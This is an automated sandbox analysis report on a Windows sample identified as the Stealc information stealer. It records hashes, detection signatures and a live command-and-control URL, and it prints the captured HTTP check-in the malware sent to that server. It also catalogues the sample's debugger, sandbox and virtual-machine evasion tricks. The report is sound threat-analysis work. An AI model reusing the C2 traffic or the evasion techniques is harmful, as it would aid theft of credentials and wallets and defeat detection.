Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1540589
MD5:7abee0417c0e20b647a09a23767c082f
SHA1:15fb1c418c08318532b0468e4e1fc39935647abb
SHA256:b6a02f7945ee3ffe763c9a12d10ad6d03c327e625b8b31fd9cfb615ed633f3dd
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3228 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7ABEE0417C0E20B647A09A23767C082F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1731598111.0000000005300000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 3228JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 3228JoeSecurity_StealcYara detected StealcJoe Security
              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.930000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-23T23:53:06.726996+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exeAvira: detected
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Source: 0.2.file.exe.930000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0093C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00939AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00939AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00937240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00937240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00939B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00939B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00948EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00948EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00944910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00944910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0093DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0093E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0093ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00944570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00944570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0093F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00943EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00943EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0093DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0093BE70

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 33 35 31 36 33 42 31 30 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 2d 2d 0d 0a Data Ascii: ------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="hwid"6335163B10381806970752------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="build"doma------CFHIIEHJKKECGCBFIIJD--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00934880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00934880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 33 35 31 36 33 42 31 30 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 2d 2d 0d 0a Data Ascii: ------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="hwid"6335163B10381806970752------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="build"doma------CFHIIEHJKKECGCBFIIJD--
                Source: file.exe, 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/(
                Source: file.exe, 00000000.00000002.1791344815.00000000015DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1791344815.0000000001615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1791344815.00000000015DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
                Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
                Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpC
                Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpp
                Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/o
                Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37n0B

                System Summary

                barindex
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F00_2_00CFB8F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFE04D0_2_00CFE04D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3E8770_2_00C3E877
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0083C0_2_00D0083C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0C1A40_2_00D0C1A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0712F0_2_00D0712F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE949B0_2_00CE949B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0E4A60_2_00D0E4A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D805DB0_2_00D805DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFED9D0_2_00CFED9D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0A5490_2_00D0A549
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D02ED20_2_00D02ED2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0FE420_2_00D0FE42
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD4E200_2_00BD4E20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D056790_2_00D05679
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 009345C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: saegsldb ZLIB complexity 0.9947668576957428
                Source: file.exe, 00000000.00000003.1731598111.0000000005300000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00948680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00948680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00943720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00943720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\23T176HN.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1875968 > 1048576
                Source: file.exeStatic PE information: Raw size of saegsldb is bigger than: 0x100000 < 0x1a3e00

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.930000.0.unpack :EW;.rsrc :W;.idata :W; :EW;saegsldb:EW;mkoehnsu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;saegsldb:EW;mkoehnsu:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00949860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00949860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d9e8d should be: 0x1ce986
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: saegsldb
                Source: file.exeStatic PE information: section name: mkoehnsu
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAC8D7 push 29CD2D6Eh; mov dword ptr [esp], edi0_2_00DAC95C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF48FE push 5A05B6E4h; mov dword ptr [esp], ebp0_2_00DF495C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D290EC push ebp; mov dword ptr [esp], 770BF243h0_2_00D290F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push ebx; mov dword ptr [esp], ebp0_2_00CFB911
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push edi; mov dword ptr [esp], 6ABAD0BCh0_2_00CFBA40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push ecx; mov dword ptr [esp], edx0_2_00CFBA4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push 58AB6F66h; mov dword ptr [esp], ebx0_2_00CFBA7E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push edi; mov dword ptr [esp], edx0_2_00CFBAD2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push edx; mov dword ptr [esp], edi0_2_00CFBAD6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push ebx; mov dword ptr [esp], 3FC67B1Eh0_2_00CFBB4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push edx; mov dword ptr [esp], 7EF6DE3Fh0_2_00CFBB78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push 6B944500h; mov dword ptr [esp], ebx0_2_00CFBBBE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push 4DB4E3F8h; mov dword ptr [esp], esi0_2_00CFBBD1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push ebx; mov dword ptr [esp], ebp0_2_00CFBBE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push eax; mov dword ptr [esp], esi0_2_00CFBD11
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push 7F7B6459h; mov dword ptr [esp], eax0_2_00CFBD79
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push 21606827h; mov dword ptr [esp], ebp0_2_00CFBDF8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push ecx; mov dword ptr [esp], 00000071h0_2_00CFBE35
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push 6DDC358Fh; mov dword ptr [esp], eax0_2_00CFBE6E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push 0F8FF536h; mov dword ptr [esp], edi0_2_00CFBEDC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push edx; mov dword ptr [esp], esp0_2_00CFBEE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push ecx; mov dword ptr [esp], edi0_2_00CFBFB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push ebp; mov dword ptr [esp], esi0_2_00CFBFCD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push 37316102h; mov dword ptr [esp], esp0_2_00CFBFF8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push 78F2EBF0h; mov dword ptr [esp], edi0_2_00CFC0B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push edi; mov dword ptr [esp], 1C023584h0_2_00CFC11E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push edi; mov dword ptr [esp], ebp0_2_00CFC20C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push 70E1FB75h; mov dword ptr [esp], edx0_2_00CFC25A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push eax; mov dword ptr [esp], edx0_2_00CFC392
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push ecx; mov dword ptr [esp], edi0_2_00CFC3C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFB8F0 push esi; mov dword ptr [esp], ecx0_2_00CFC57E
                Source: file.exeStatic PE information: section name: saegsldb entropy: 7.953512758642051

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00949860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00949860

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13667
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1465A second address: D1465E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1465E second address: D14662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D14662 second address: D14686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDA2529D366h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDA2529D370h 0x00000013 jc 00007FDA2529D366h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D14686 second address: D14694 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDA252A1686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D14694 second address: D1469A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1358D second address: D135BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA252A168Ch 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FDA252A168Ch 0x00000010 popad 0x00000011 jc 00007FDA252A1693h 0x00000017 jmp 00007FDA252A168Dh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D135BF second address: D135D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FDA2529D374h 0x0000000e pushad 0x0000000f js 00007FDA2529D366h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13709 second address: D13724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDA252A1692h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13724 second address: D1372C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
